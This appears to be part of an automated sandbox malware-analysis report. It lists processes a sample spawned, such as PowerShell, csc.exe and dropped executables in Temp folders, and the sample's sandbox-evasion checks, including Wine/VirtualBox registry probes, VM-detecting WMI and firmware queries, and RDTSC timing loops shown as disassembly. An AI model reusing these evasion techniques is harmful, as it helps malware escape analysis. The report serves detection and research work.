                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\Public\Netstat\FuturreApp.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-10625
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_3-37315
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9694
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                                Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeSystem information queried: FirmwareTableInformation
                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.000000000137D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                                Source: skotes.exe, 00000003.00000002.7286155793.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.000000000137D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5972263346.00000000013CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F241 second address: 44F245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44F245 second address: 44F268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1660h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA165Ch 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435B8F second address: 435BAC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E60CAC68Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435BAC second address: 435BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F5E60BA1656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jnp 00007F5E60BA1656h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop ecx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 435BC5 second address: 435BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44E99C second address: 44E9BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA166Dh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44EB1F second address: 44EB50 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60CAC692h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC698h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4526EA second address: 45276C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a or esi, dword ptr [ebp+122D1F92h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 add ecx, 38E5171Ah 0x0000001a movsx edx, di 0x0000001d push 00000003h 0x0000001f or dword ptr [ebp+122D219Dh], ecx 0x00000025 push D5F63A53h 0x0000002a jnc 00007F5E60BA165Ch 0x00000030 xor dword ptr [esp], 15F63A53h 0x00000037 mov dword ptr [ebp+122D1CA7h], ebx 0x0000003d lea ebx, dword ptr [ebp+124574F0h] 0x00000043 jmp 00007F5E60BA1669h 0x00000048 push eax 0x00000049 push ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F5E60BA1664h 0x00000051 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45276C second address: 452770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45293B second address: 452941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 452941 second address: 452973 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E60CAC688h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F5E60CAC696h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F5E60CAC688h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 463AE8 second address: 463AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FB28 second address: 46FB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FCD8 second address: 46FCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1660h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FCED second address: 46FD29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60CAC692h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F5E60CAC686h 0x00000012 popad 0x00000013 jmp 00007F5E60CAC695h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FD29 second address: 46FD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FED7 second address: 46FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC692h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FEED second address: 46FEF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FEF3 second address: 46FF1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007F5E60CAC698h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF1C second address: 46FF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F5E60BA1656h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF2A second address: 46FF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46FF2E second address: 46FF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47044E second address: 47046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC692h 0x00000009 jmp 00007F5E60CAC68Bh 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47046F second address: 470473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705D5 second address: 4705DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705DC second address: 4705F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60BA1667h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4705F8 second address: 47061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F5E60CAC686h 0x0000000f jmp 00007F5E60CAC696h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470756 second address: 470768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470768 second address: 4707BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5E60CAC6A3h 0x0000000b popad 0x0000000c jne 00007F5E60CAC6C4h 0x00000012 jns 00007F5E60CAC692h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E60CAC68Fh 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A21 second address: 470A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A27 second address: 470A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A30 second address: 470A46 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA1660h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A46 second address: 470A71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E60CAC68Bh 0x00000013 pushad 0x00000014 jmp 00007F5E60CAC68Dh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A71 second address: 470A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A76 second address: 470A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60CAC692h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 470A8C second address: 470A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446A51 second address: 446A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 471434 second address: 471454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E60BA1667h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 471454 second address: 47145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5E60CAC686h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47145E second address: 471462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475C75 second address: 475C7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E60CAC686h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475DD3 second address: 475E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Dh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F5E60BA1668h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E08 second address: 475E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E1B second address: 475E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F5E60BA1656h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E60BA1668h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 475E45 second address: 475E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 474CFA second address: 474D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5E60BA1656h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 437681 second address: 437688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DA0A second address: 47DA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5E60BA165Eh 0x00000010 jmp 00007F5E60BA165Fh 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD79 second address: 47DD93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47DD93 second address: 47DD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
